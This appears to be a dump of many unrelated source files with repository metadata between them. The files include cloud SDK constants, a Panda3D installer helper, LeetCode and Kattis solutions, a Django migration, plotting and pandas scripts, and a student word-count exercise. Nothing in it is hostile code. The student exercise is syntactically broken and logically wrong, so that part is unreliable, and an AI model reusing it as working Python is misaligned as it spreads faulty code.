INVALIDPARAMETERVALUE_TAGNAMELENGTHLIMIT = 'InvalidParameterValue.TagNameLengthLimit'
# The maximum number of entries to be added in batches is exceeded.
LIMITEXCEEDED_AREAQUOTA = 'LimitExceeded.AreaQuota'
# Missing parameter.
MISSINGPARAMETER = 'MissingParameter'
# The resource does not exist.
RESOURCENOTFOUND = 'ResourceNotFound'
| [
"tencentcloudapi@tenent.com"
] | tencentcloudapi@tenent.com |
f3a6c973676ba8b267b8fa1e5199895b9be7deb1 | ba0cbdae81c171bd4be7b12c0594de72bd6d625a | /MyToontown/Panda3D-1.9.0/direct/pyinst/installutils.py | 66eca013464126d08d7eeba3bad65df0cecb3bb2 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | sweep41/Toontown-2016 | 65985f198fa32a832e762fa9c59e59606d6a40a3 | 7732fb2c27001264e6dd652c057b3dc41f9c8a7d | refs/heads/master | 2021-01-23T16:04:45.264205 | 2017-06-04T02:47:34 | 2017-06-04T02:47:34 | 93,279,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,790 | py | # copyright 1999 McMillan Enterprises, Inc.
# demo code - use as you please.
import os
import stat
def copyFile(srcFiles, destFile, append=0):
'''
Copy one or more files to another file. If srcFiles is a list, then all
will be concatenated together to destFile. The append flag is also valid
for single file copies.
destFile will have the mode, ownership and timestamp of the last file
copied/appended.
'''
if type(srcFiles) == type([]):
# in case we need to overwrite on the first file...
copyFile(srcFiles[0], destFile, append)
for file in srcFiles[1:]:
copyFile(file, destFile, 1)
return
mode = 'wb'
if append:
mode = 'ab'
print " ", srcFiles, "->",
input = open(srcFiles, 'rb')
if input:
print destFile
output = open(destFile, mode)
while 1:
bytesRead = input.read(8192)
if bytesRead:
output.write(bytesRead)
else:
break
input.close()
output.close()
stats = os.stat(srcFiles)
os.chmod(destFile, stats[stat.ST_MODE])
try: # FAT16 file systems have only one file time
os.utime(destFile, (stats[stat.ST_ATIME], stats[stat.ST_MTIME]))
except:
pass
try:
os.chown(destFile, stats[stat.ST_UID], stats[stat.ST_GID])
except:
pass
def ensure(dirct):
dirnm = dirct
plist = []
try:
while not os.path.exists(dirnm):
dirnm, base = os.path.split(dirnm)
if base == '':
break
plist.insert(0, base)
for d in plist:
dirnm = os.path.join(dirnm, d)
os.mkdir(dirnm)
except:
return 0
return 1
def getinstalldir(prompt="Enter an installation directory: "):
while 1:
installdir = raw_input("Enter an installation directory: ")
installdir = os.path.normpath(installdir)
if ensure(installdir):
break
else:
print installdir, "is not a valid pathname"
r = raw_input("Try again (y/n)?: ")
if r in 'nN':
sys.exit(0)
return installdir
def installCArchive(nm, basedir, suffixdir):
import carchive_rt
fulldir = os.path.join(basedir, suffixdir)
if ensure(fulldir):
pkg = carchive_rt.CArchive(nm)
for fnm in pkg.contents():
stuff = pkg.extract(fnm)[1]
outnm = os.path.join(fulldir, fnm)
if ensure(os.path.dirname(outnm)):
open(outnm, 'wb').write(stuff)
pkg = None
os.remove(nm)
| [
"sweep14@gmail.com"
] | sweep14@gmail.com |
8c3aaaf2d9408dc92686db92188f28478d2d1435 | 33a32d7d7b482206852a7bbeb7fa507f55ca53dd | /models/category.py | 3f0f824e93bb71a744c8707273430117db463718 | [] | no_license | stanislawK/bookshelf | 94277b0103b522302782c3a5fed9e4c790d6f86f | fa68dda7f88c83080ad9a51a1ed16994b2bca054 | refs/heads/master | 2020-05-21T18:44:14.396967 | 2019-05-20T10:04:06 | 2019-05-20T10:04:06 | 186,138,290 | 0 | 0 | null | 2019-05-20T08:11:44 | 2019-05-11T13:47:42 | Python | UTF-8 | Python | false | false | 494 | py | from bookshelf.extensions import db
class CategoryModel(db.Model):
__tablename__ = 'categories'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
@classmethod
def find_by_name(cls, _name):
return cls.query.filter_by(name=_name).first()
@classmethod
def find_by_id(cls, _id):
return cls.query.filter_by(id=_id).first()
def save_to_db(self):
db.session.add(self)
db.session.commit()
| [
"stanislaw.krupienko@gmail.com"
] | stanislaw.krupienko@gmail.com |
4f0372e774eb8b7d1ce6d898124f7ccc4c782e29 | d41d18d3ea6edd2ec478b500386375a8693f1392 | /plotly/validators/contourcarpet/colorbar/tickfont/_family.py | 15aef26e53e16075df0e8f184ac20f62ac43a276 | [
"MIT"
] | permissive | miladrux/plotly.py | 38921dd6618650d03be9891d6078e771ffccc99a | dbb79e43e2cc6c5762251537d24bad1dab930fff | refs/heads/master | 2020-03-27T01:46:57.497871 | 2018-08-20T22:37:38 | 2018-08-20T22:37:38 | 145,742,203 | 1 | 0 | MIT | 2018-08-22T17:37:07 | 2018-08-22T17:37:07 | null | UTF-8 | Python | false | false | 514 | py | import _plotly_utils.basevalidators
class FamilyValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name='family',
parent_name='contourcarpet.colorbar.tickfont',
**kwargs
):
super(FamilyValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='colorbars',
no_blank=True,
role='style',
strict=True,
**kwargs
)
| [
"adam.kulidjian@gmail.com"
] | adam.kulidjian@gmail.com |
6988d0bf81d29b125be98f70f357cda2d3f89cd1 | 6ab810f6ca51dc2e2d0b7197fc1866b738ca70a2 | /Contest/WC213/5555.统计字典序元音字符串的数目.py | eb45f72780ddd673963c0da027b281fa4e3be4db | [
"MIT"
] | permissive | ApocalypseMac/LeetCode | 2309223be0c3e2969850cf1770eef2a447d39317 | 84c229eaf5a2e617ca00cabed04dd76d508d60b8 | refs/heads/master | 2023-04-14T19:22:34.340333 | 2021-03-28T05:20:40 | 2021-03-28T05:20:40 | 282,896,723 | 1 | 2 | MIT | 2020-07-29T05:05:19 | 2020-07-27T12:49:40 | Python | UTF-8 | Python | false | false | 310 | py | class Solution:
def countVowelStrings(self, n: int) -> int:
dp = [[0] * 5 for _ in range(n + 1)]
for i in range(n + 1):
dp[i][0] = 1
for i in range(1, n + 1):
for j in range(1, 5):
dp[i][j] = dp[i-1][j] + dp[i][j-1]
return sum(dp[-1]) | [
"ApocalypseMac@users.noreply.github.com"
] | ApocalypseMac@users.noreply.github.com |
5a2519e963859ae158490a2f5abc861b2d5ddaed | 9805edf2b923c74cf72a3cfb4c2c712255256f15 | /python/041_first_missing_positive.py | 00bc37e88ed085cdb52e6a5065ea4211b936dbd3 | [
"MIT"
] | permissive | jixinfeng/leetcode-soln | 5b28e49c2879cdff41c608fc03628498939b0e99 | 24cf8d5f1831e838ea99f50ce4d8f048bd46c136 | refs/heads/master | 2022-10-12T17:02:53.329565 | 2022-10-06T03:21:56 | 2022-10-06T03:21:56 | 69,371,757 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,004 | py | """
Given an unsorted integer array, find the first missing positive integer.
For example,
Given [1,2,0] return 3,
and [3,4,-1,1] return 2.
Your algorithm should run in O(n) time and uses constant space.
"""
class Solution(object):
def firstMissingPositive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if nums is None or nums == []:
return 1
i = 0
n = len(nums)
while i < n:
if nums[i] > 0 and nums[i] < n and nums[i] != nums[nums[i] - 1]:
nums[nums[i] - 1], nums[i] = nums[i], nums[nums[i] - 1]
else:
i += 1
for i in range(n):
if nums[i] != i + 1:
return i + 1
return n + 1
a = Solution()
assert a.firstMissingPositive([1,2,0]) == 3
assert a.firstMissingPositive([3,4,-1,1]) == 2
assert a.firstMissingPositive([2]) == 1
assert a.firstMissingPositive([1,1]) == 2
assert a.firstMissingPositive([1000,-1]) == 1
| [
"ufjfeng@users.noreply.github.com"
] | ufjfeng@users.noreply.github.com |
61b010f0c53d635bc3d60ea40135546e539a1c46 | 60e4baae4d6b323b3d3b656df3a7b0ea3ca40ef2 | /project/apps/content/migrations/0011_auto_20180112_0303.py | 45634aba944d38cfd3ac6dae8c65c055ac45551b | [] | no_license | Burzhun/Big-django-project | a03a61a15ee75f49324ad7ea51372b6b013d1650 | 1a71f974b7b5399a45862711b5f858c0d4af50d2 | refs/heads/master | 2020-04-11T00:16:06.211039 | 2018-12-11T19:13:38 | 2018-12-11T19:13:38 | 161,381,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-12 03:03
from __future__ import unicode_literals
from django.utils import timezone
from django.db import migrations
from itertools import chain
import json
def migrate_published_dates(apps, schema_editor):
article_pages = apps.get_model('content', 'ArticlePage').objects.all()
news_pages = apps.get_model('content', 'NewsPage').objects.all()
blog_pages = apps.get_model('content', 'BlogPage').objects.all()
for page in chain(article_pages, news_pages, blog_pages):
page.published_at = page.go_live_at
page.go_live_at = None
page.save()
revision = page.revisions.order_by('-created_at', '-id').first()
if not revision:
continue
content_json = json.loads(revision.content_json)
content_json["published_at"] = str(page.published_at)
try:
del content_json["go_live_at"]
except:
pass
revision.content_json = json.dumps(content_json)
revision.save()
class Migration(migrations.Migration):
dependencies = [
('content', '0010_auto_20180112_0254'),
]
operations = [
migrations.RunPython(migrate_published_dates),
]
| [
"burjunov@yandex.ru"
] | burjunov@yandex.ru |
c09e01caaebea0f93a9e3aa35d47a7ed3b477620 | d96787f92bd86c8d8bcf01a4e7ec8f7feec24194 | /kattis/acm/solution.py | 26e0a74268c2f86a516dd1d097fcb4055afcc15e | [] | no_license | iandioch/solutions | 133cbc3af58fadcde0b2e981fb0e7d05801070a7 | 8b3e458b3c01179ddf776bfbb897f263f22f3693 | refs/heads/master | 2023-04-09T03:39:16.952817 | 2023-03-15T20:00:53 | 2023-03-15T20:00:53 | 47,693,495 | 48 | 40 | null | 2019-10-22T14:52:59 | 2015-12-09T13:36:55 | Python | UTF-8 | Python | false | false | 477 | py | solved = {} # map question to time solved
tries_before_solving = {}
while True:
p = input().split()
if len(p) == 1:
break
time = int(p[0])
q = p[1]
if q in solved:
continue
if q in tries_before_solving:
tries_before_solving[q] += 1
else:
tries_before_solving[q] = 1
if p[2] == 'right':
solved[q] = time
print(len(solved), end=' ')
print(sum([solved[x] + 20*(tries_before_solving[x]-1) for x in solved]))
| [
"iandioch11@gmail.com"
] | iandioch11@gmail.com |
5cdc3d8fc2d6064c8aed7bcf1fc396041a3ef2a1 | ff6248be9573caec94bea0fa2b1e4b6bf0aa682b | /StudentProblem/10.21.11.2/1/1569578564.py | a178fed62c1e5d05670590176c94822f3406337d | [] | no_license | LennartElbe/codeEvo | 0e41b1a7705204e934ef71a5a28c047366c10f71 | e89b329bc9edd37d5d9986f07ca8a63d50686882 | refs/heads/master | 2020-12-21T17:28:25.150352 | 2020-03-26T10:22:35 | 2020-03-26T10:22:35 | 236,498,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,645 | py | import functools
import typing
import string
import random
import pytest
## Lösung Teil 1.
def nwords(s: str) -> n:
""" Funktion berechnet zu einem String Argument s die Anzahl der Worte im String.
args: string
returns: n
"""
n = 0
for i in (len(str)): #looping "abc abc"
if s[i] is string.whitespace:
n+=1 #code fehlerhaft, bei mehreren whitespaces
return n
## Lösung Teil 2.
def word_count_iter(it: iter) -> tuple:
""" Funktion nimmt iterierbares Argument , das bei jeder Iteration eine Zeile (einen String) liefert
Funktion liefert als Ergebnis ein Tupel aus der Anzahl der Zeilen, der Anzahl der Worte und der Anzahl der Zeichen,
die aus dem Argument gelesen worden sind.
Args: it iterierbares Objekt
Returns: t ein Tupel
"""
t=(,,)
pass
######################################################################
## Lösung Teil 3. (Tests)
def test_word_counter_iter():
assert word_count_iter("abc abc") == (,,)
assert word_count_iter("") == (,,)
assert word_count_iter("abc abc") == (,,)
## revert
try:
word_count_iter = word_count_iter.__wrapped__
except:
pass
## Lösung Teil 4.
def word_count(f: file) -> tuple:
"""
Funktion word_count nimmt einen Dateinamen f als Argument und liefert als Ergebnis ein Tupel aus der Anzahl der Zeilen,
der Anzahl der Worte und der Anzahl der Zeichen , die aus der zugehörigen Datei gelesen worden sind.
Args: f einen Dateinamen
Returns: tuple
"""
pass
######################################################################
| [
"lenni.elbe@gmail.com"
] | lenni.elbe@gmail.com |
3f038c912cdab138dfec0d40cf9f50af36ae68e9 | e98f3960d0465c91ec1e39272a49ce5ce4496708 | /src/ecldoc/parseDoc.py | b422e00207890399779faefac982fe2ebc84ceb4 | [] | no_license | successar/ecldoc | 7336c26291e68663e4bc739ab891f521724245cf | c7c7458c1bafb2bf9563a082fc05da5f64ef0a2e | refs/heads/master | 2021-01-14T08:22:04.824906 | 2017-08-12T12:02:19 | 2017-08-12T12:02:19 | 81,946,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,712 | py | import re
from lxml import etree
import lxml.html as H
from collections import defaultdict
def parseDocstring(docstring) :
'''
Parse Docstring as returned by eclcc,
break into individual tags and
return them as XML Elements
'''
docstring = re.sub(r'\n\s*\*', '\n', docstring)
docstring = re.sub(r'\r', ' ', docstring)
docstring = docstring.strip().split('\n')
docdict = defaultdict(list)
current_tag = 'content'
current_text = ''
for line in docstring :
is_tag = re.search(r'^\s*@', line)
if is_tag :
if current_tag == 'content' :
docdict['firstline'] = [findFirstLine(current_text)]
docdict[current_tag].append(current_text.strip())
line = re.split(r'\s', line.lstrip(), maxsplit=1)
tag = line[0][1:]
text = line[1]
current_tag = tag
current_text = text + '\n'
else :
current_text += line + '\n'
if current_tag == 'content' :
docdict['firstline'] = [findFirstLine(current_text)]
docdict[current_tag].append(current_text.strip())
for tag in docdict :
for i, desc in enumerate(docdict[tag]) :
root = H.fragment_fromstring(desc, create_parent='div')
removeWS(root)
content = etree.Element(tag)
content.text = etree.tostring(root)
content.text = re.sub(r'^<div>', '', content.text)
content.text = re.sub(r'</div>$', '', content.text)
docdict[tag][i] = content
return docdict
def removeWS(element) :
'''
Format Whitespace in HTML elements in docstring
coming from parsed XML Output of ECL File
'''
if element.tag == 'pre' :
lines = element.text.split('\n')
element.text = lines[0]
for line in lines[1:] :
br = etree.Element('br')
br.tail = line
element.append(br)
return
if element.text is not None :
element.text = re.sub(r'\s+', ' ', element.text)
for e in element.iterchildren() :
if e.tail :
e.tail = re.sub(r'\s+', ' ', e.tail)
removeWS(e)
def findFirstLine(current_text) :
'''
Find First line in docstring content section to be used as caption
in TOC and Tree
'''
split_1 = re.split(r'\.\s|\.$', current_text.strip(), maxsplit=1)
if len(split_1) == 2 :
return split_1[0].strip()
split_2 = re.split(r'\n', current_text.strip(), maxsplit=1)
return split_2[0].strip()
##########################################################
def construct_type(ele) :
'''
Parse Type Tree into single string representation
'''
if ele is None : return ''
if type(ele) == list : return ''
typestring = ''
attribs = ele.attrib
typename = attribs['type']
if typename == 'record' :
if 'unnamed' in attribs :
typestring += '{ '
fields = []
for field in ele.findall('Field') :
fields.append(construct_type(field.find('./Type')) + " " + field.attrib['name'])
typestring += ' , '.join(fields) + ' }'
else :
typestring += attribs['origfn'] if 'origfn' in attribs else attribs['name']
else :
typestring += typename.upper()
if 'origfn' in attribs :
typestring += ' ( ' + attribs['origfn'] + ' )'
elif 'name' in attribs :
typestring += ' ( ' + attribs['name'] + ' )'
if typename == 'function' :
typestring += ' [ '
params = []
for p in ele.find('Params').findall('Type') :
params.append(construct_type(p))
typestring += ' , '.join(params) + ' ]'
if ele.find('./Type') is not None :
typestring += ' ( ' + construct_type(ele.find('./Type')) + ' )'
return typestring
##########################################################
def cleansign(text) :
'''
Remove irrelevant prefix and suffixes from signature
'''
text = re.sub(r'^export', '', text, flags=re.I)
text = re.sub(r'^shared', '', text, flags=re.I)
text = re.sub(r':=$', '', text, flags=re.I)
text = re.sub(r';$', '', text, flags=re.I)
text = re.sub(r'\s+', ' ', text.strip())
return text
def breaksign(name, text) :
'''
Heuristically break signature of ECL Definition
recovered from ecl file into "return name (Paramters)"
'''
name = name.lower()
string = ' ' + text.lower() + ' '
pos = 1
open_bracks = ['{', '(', '[']
close_bracks = ['}', ')', ']']
stack = []
ret, param = '', ''
indent_len = 0
name_len = len(name)
for i in range(1, len(string)) :
c = string[i]
if c in open_bracks :
stack.append(c)
elif c in close_bracks :
if stack[-1] == open_bracks[close_bracks.index(c)] :
stack = stack[:-1]
else :
if len(stack) == 0 :
m = re.match(r'[\s\)]' + name + r'([^0-9A-Za-z_])', string[pos-1:])
if m :
pos = pos - 1
ret = text[:pos]
param = text[pos + name_len:]
indent_len = pos + name_len
break
pos += 1
return ret.strip(), param.strip(), indent_len
##########################################################
def getTags(doc) :
'''
Convert XML Documentation (generated using parseDocstring)
back to JSON (ie Python Dictionary)
'''
tag_dict = defaultdict(list)
if doc is None : return tag_dict
for child in doc.getchildren() :
tag_dict[child.tag].append(child.text)
return tag_dict
| [
"successar@gmail.com"
] | successar@gmail.com |
de2e4a9bf1208d0184327f19cfd432928ffbfdde | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /dcFp6EuCm8J2HNKFG_21.py | 75a6a5b07dd4596969ad89d81d4ceb4d5cc5bf5a | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py |
def func(lst):
global res
res = 0
fun(lst)
return res
def fun(lst):
global res
if isinstance(lst,list):
res += len(lst)
for l in lst:
fun(l)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
0c9ef5dcdc3f510c6972175e849cf43b3caee43c | 651a296c8f45b5799781fd78a6b5329effe702a0 | /c8lib/c8vec_uniform_01.py | f77127fe01f76857c299aa377e44b3252af5e4c8 | [] | no_license | pdhhiep/Computation_using_Python | 095d14370fe1a01a192d7e44fcc81a52655f652b | 407ed29fddc267950e9860b8bbd1e038f0387c97 | refs/heads/master | 2021-05-29T12:35:12.630232 | 2015-06-27T01:05:17 | 2015-06-27T01:05:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,367 | py | #!/usr/bin/env python
def c8vec_uniform_01 ( n, seed ):
#*****************************************************************************80
#
## C8VEC_UNIFORM_01 returns a unit pseudorandom C8VEC.
#
# Discussion:
#
# The angles should be uniformly distributed between 0 and 2 * PI,
# the square roots of the radius uniformly distributed between 0 and 1.
#
# This results in a uniform distribution of values in the unit circle.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 06 April 2013
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Paul Bratley, Bennett Fox, Linus Schrage,
# A Guide to Simulation,
# Second Edition,
# Springer, 1987,
# ISBN: 0387964673,
# LC: QA76.9.C65.B73.
#
# Bennett Fox,
# Algorithm 647:
# Implementation and Relative Efficiency of Quasirandom
# Sequence Generators,
# ACM Transactions on Mathematical Software,
# Volume 12, Number 4, December 1986, pages 362-376.
#
# Pierre L'Ecuyer,
# Random Number Generation,
# in Handbook of Simulation,
# edited by Jerry Banks,
# Wiley, 1998,
# ISBN: 0471134031,
# LC: T57.62.H37.
#
# Peter Lewis, Allen Goodman, James Miller,
# A Pseudo-Random Number Generator for the System/360,
# IBM Systems Journal,
# Volume 8, Number 2, 1969, pages 136-143.
#
# Parameters:
#
# Input, integer N, the number of values to compute.
#
# Input, integer SEED, a seed for the random number generator.
#
# Output, complex C(N), the pseudorandom complex vector.
#
# Output, integer SEED, a seed for the random number generator.
#
import numpy
from math import cos, floor, pi, sin, sqrt
from sys import exit
i4_huge = 2147483647
seed = floor ( seed )
if ( seed < 0 ):
seed = seed + i4_huge
if ( seed == 0 ):
print ''
print 'C8VEC_UNIFORM_01 - Fatal error!'
print ' Input SEED = 0!'
exit ( 'C8VEC_UNIFORM_01 - Fatal error!' )
c = numpy.zeros ( n, 'complex' )
for j in range ( 0, n ):
k = floor ( seed / 127773 )
seed = 16807 * ( seed - k * 127773 ) - k * 2836
if ( seed < 0 ):
seed = seed + i4_huge
r = sqrt ( seed * 4.656612875E-10 )
k = floor ( seed / 127773 )
seed = 16807 * ( seed - k * 127773 ) - k * 2836
if ( seed < 0 ):
seed = seed + i4_huge
theta = 2.0 * pi * seed * 4.656612875E-10
c[j] = r * complex ( cos ( theta ), sin ( theta ) )
return c, seed
def c8vec_uniform_01_test ( ):
#*****************************************************************************80
#
## C8VEC_UNIFORM_01_TEST tests C8VEC_UNIFORM_01.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 06 April 2013
#
# Author:
#
# John Burkardt
#
seed = 123456789
print ''
print 'C8VEC_UNIFORM_01_TEST'
print ' C8VEC_UNIFORM_01 computes pseudorandom complex values'
print ' in the unit circle.'
print ''
print ' The initial seed is %d' % ( seed )
print ''
n = 10
[ x, seed ] = c8vec_uniform_01 ( n, seed )
for i in range ( 0, n ):
print ' %6d ( %f, %f )' % ( i, x[i].real, x[i].imag )
print ''
print 'C8VEC_UNIFORM_01_TEST:'
print ' Normal end of execution.'
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
c8vec_uniform_01_test ( )
timestamp ( )
| [
"siplukabir@gmail.com"
] | siplukabir@gmail.com |
a4109108ce79ce8ffa413a457964c2fc31fa84dd | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /6NoaFGKJgRW6oXhLC_20.py | b805a8bd5efdd4230470dd426cbebc9d41b4ae6f | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | py |
def sum_of_vowels(txt):
count = 0
txt = txt.upper()
for x in txt:
if x == "A":
count += 4
elif x == "E":
count += 3
elif x == "I":
count += 1
else:
count += 0
return count
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
c890c2a824190f02edfa382c7de2388243c80273 | d99e73252210d9ab5dea0b46d2f82f8a036373ce | /scripts/rawFoldTime.py | ee6e0616d95093414fa34bdc91064d3e9dc32732 | [] | no_license | schwancr/schwancr_bin | 710378ebca8482b1e4e38be894a22349e808e18a | fb42d40ac7be4b9984c257c09b569d740926781a | refs/heads/master | 2016-08-04T23:36:29.658194 | 2015-06-30T18:26:04 | 2015-06-30T18:26:04 | 7,841,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,813 | py | #!/usr/bin/env python
from optparse import OptionParser
parser = OptionParser()
parser.add_option('-p',dest='proj_FN',default='../ProjectInfo.h5',help='ProjectInfo.h5 from msmbuilder [ ../ProjectInfo.h5 ]')
parser.add_option('-d',dest='data_FN',help='Data to use as a metric for folded and unfolded states' )
parser.add_option('--fc', dest='f_cut',type=float,help='Folded cutoff')
parser.add_option('--uc',dest='u_cut',type=float,help='Unfolded cutoff')
parser.add_option('--low-is-folded',dest='low_is_folded',default=False,action='store_true',help='Pass this flag if a small number means the conformation is folded (i.e. RMSD)')
parser.add_option('-o',dest='out_FN',default='Fold_Unfold_Times.pdf',help='Output file to write to')
options, args = parser.parse_args()
from numpy import *
from msmbuilder import Project
from pyschwancr import dataIO, msmTools
import os, sys, re
import matplotlib
matplotlib.use('pdf')
from matplotlib.pyplot import *
from scipy import optimize
Proj = Project.Project.LoadFromHDF( options.proj_FN )
Data = dataIO.readData( options.data_FN )
# first reshape the data into trajectories.
Lens = Proj['TrajLengths']
Trajs = []
sum = 0
for i in range( len( Lens ) ):
Trajs.append( Data[ sum : sum + Lens[i] ] )
sum += Lens[i]
Folds = []
Unfolds = []
for traj in Trajs:
(a,b) = msmTools.calcRawFoldTime( traj, options.f_cut, options.u_cut, low_is_folded = options.low_is_folded )
Folds.extend( a )
Unfolds.extend( b )
#FoldsDist = bincount( Folds )
#UnfoldsDist = bincount( Unfolds )
figure()
subplot(211)
foldHist = hist( Folds, bins=100, color = 'blue', label='Fold' )
vlines( mean( Folds ), 0, ylim()[1], color = 'black', linewidth=3 )
ylabel('Frequency')
legend()
xFolds = xlim()
subplot(212)
unfoldHist = hist( Unfolds, bins=100, color = 'red', label='Unfold' )
vlines( mean( Unfolds), 0, ylim()[1], color = 'black', linewidth=3 )
ylabel('Frequency')
legend()
xUnfolds = xlim()
xlabel('Fold/Unfold Times (frames)')
suptitle('Distribution of Folding/Unfolding times')
subplot(211)
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
text( xlim()[1] * 0.3, ylim()[1] * 0.8, 'Mean = %.2f\nN = %d' % ( mean( Folds ), len( Folds ) ) )
yLimF = ylim()
subplot(212)
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
text( xlim()[1] * 0.3, ylim()[1] * 0.8, 'Mean = %.2f\nN = %d' % ( mean( Unfolds ), len( Unfolds ) ) )
yLimU = ylim()
savefig( options.out_FN )
yFold = foldHist[0]
xFold = array( [ ( foldHist[1][i+1] + foldHist[1][i] ) / 2. for i in range( len( foldHist[0] ) ) ] )
yUnfold = unfoldHist[0]
xUnfold = array( [ ( unfoldHist[1][i+1] + unfoldHist[1][i] ) / 2. for i in range( len( unfoldHist[0] ) ) ] )
expFit = lambda p, x : p[0] * exp( - p[1] * x )
powFit = lambda p, x : p[0] * x ** ( - p[1] )
errExp = lambda p, x, y : expFit( p, x ) - y
errPow = lambda p, x, y : powFit( p, x ) - y
foldExp = optimize.leastsq( errExp, x0 = [100,0.001], args = ( xFold, yFold ), maxfev = 1000000 )
foldPow = optimize.leastsq( errPow, x0 = [1,1], args = ( xFold, yFold ), maxfev = 1000000 )
unfoldExp = optimize.leastsq( errExp, x0 = [100,0.001], args = ( xUnfold, yUnfold ), maxfev = 1000000 )
unfoldPow = optimize.leastsq( errPow, x0 = [1,1], args = ( xUnfold, yUnfold ), maxfev = 1000000 )
SStot_F = ( ( yFold - yFold.mean() ) **2 ).sum()
SStot_U = ( ( yUnfold - yUnfold.mean() ) ** 2 ).sum()
SSerr_F_exp = ( ( yFold - expFit( foldExp[0], xFold ) ) ** 2 ).sum()
SSerr_F_pow = ( ( yFold - powFit( foldPow[0], xFold ) ) ** 2 ).sum()
SSerr_U_exp = ( ( yUnfold - expFit( unfoldExp[0], xUnfold ) ) ** 2 ).sum()
SSerr_U_pow = ( ( yUnfold - powFit( unfoldPow[0], xUnfold ) ) ** 2 ).sum()
R2_F_exp = 1 - SSerr_F_exp / SStot_F
R2_F_pow = 1 - SSerr_F_pow / SStot_F
R2_U_exp = 1 - SSerr_U_exp / SStot_U
R2_U_pow = 1 - SSerr_U_pow / SStot_U
figure()
xi = linspace( 1, max(xFolds[1], xUnfolds[1]), 1000 )
subplot(211)
scatter( xFold, yFold, color = 'blue', label='Fold Times' )
plot( xi, expFit( foldExp[0], xi ), color='purple', label='Exponential' )
plot( xi, powFit( foldPow[0], xi ), color='orange', label='Power Law' )
ylabel('Frequency')
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
ylim( yLimF )
text(0.3*xlim()[1], ylim()[1]*0.7, u"Exp: R\xb2 = %.4f\nPow: R\xb2 = %.4f" % ( R2_F_exp, R2_F_pow ) )
legend()
subplot(212)
scatter( xUnfold, yUnfold, color = 'red', label = 'Unfold Times' )
plot( xi, expFit( unfoldExp[0], xi ), color='purple', label='Exponential' )
plot( xi, powFit( unfoldPow[0], xi ), color='orange', label='Power Law' )
ylabel('Frequency')
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
ylim( yLimU )
text(0.3*xlim()[1], ylim()[1]*0.7, u"Exp: R\xb2 = %.4f\nPow: R\xb2 = %.4f" % ( R2_U_exp, R2_U_pow ) )
legend()
suptitle('Fits of Distribution of Folding/Unfolding Times')
xlabel('Fold/Unfold Times (frames)')
savefig( options.out_FN[:-4] + 'FITS' + options.out_FN[-4:] )
| [
"schwancr@stanford.edu"
] | schwancr@stanford.edu |
eb08eed3392c1000edd7dfa16c3c1cbf171d51e6 | 0d8ee78f61660343e5feec41a53269dbf5585fa3 | /Demo11/fill_nan.py | 2705a3af2c26a7166ff0fe404b2b0e9ae7b01c2b | [] | no_license | x-jeff/Python_Code_Demo | 41b033f089fa19d8c63b2f26bf66ef379738c4ad | 9bc458b08cfae0092e8f11a54031ca2e7017affc | refs/heads/master | 2023-07-29T16:34:34.222620 | 2023-07-09T10:38:23 | 2023-07-09T10:38:23 | 176,306,727 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,954 | py | import pandas as pd
import numpy as np
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,np.nan],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87]])
df.columns=["Name","Gender","Age","Height","Weight"]
df["Salary"]=np.nan
print(df)
#使用数值2填补缺失值
print(df.fillna(2))
#使用平均值填补缺失值
df["Age"].fillna(df["Age"].mean())
print(df)
df["Age"].fillna(df["Age"].mean(),inplace=True)
print(df)
np.random.seed(1)
df=pd.DataFrame({"key1":list('aabba'),"key2":["one","two","one","two","one"],"data1":np.random.randn(5),"data2":np.random.randn(5)})
print(df)
#求分层平均数
grouped=df["data1"].groupby(df["key1"])
print(grouped.mean())
# df["data1"]=df["data1"].groupby(df["key1"]).transform("mean")#方法一
df["data1"]=df.groupby("key1")["data1"].transform("mean")#方法二
print(df)
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,np.nan],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87],["Jim","M",23,np.nan,np.nan]])
df.columns=["Name","Gender","Age","Height","Weight"]
df["Salary"]=np.nan
print(df)
#用各性别年龄平均值填补缺失值
#方式一
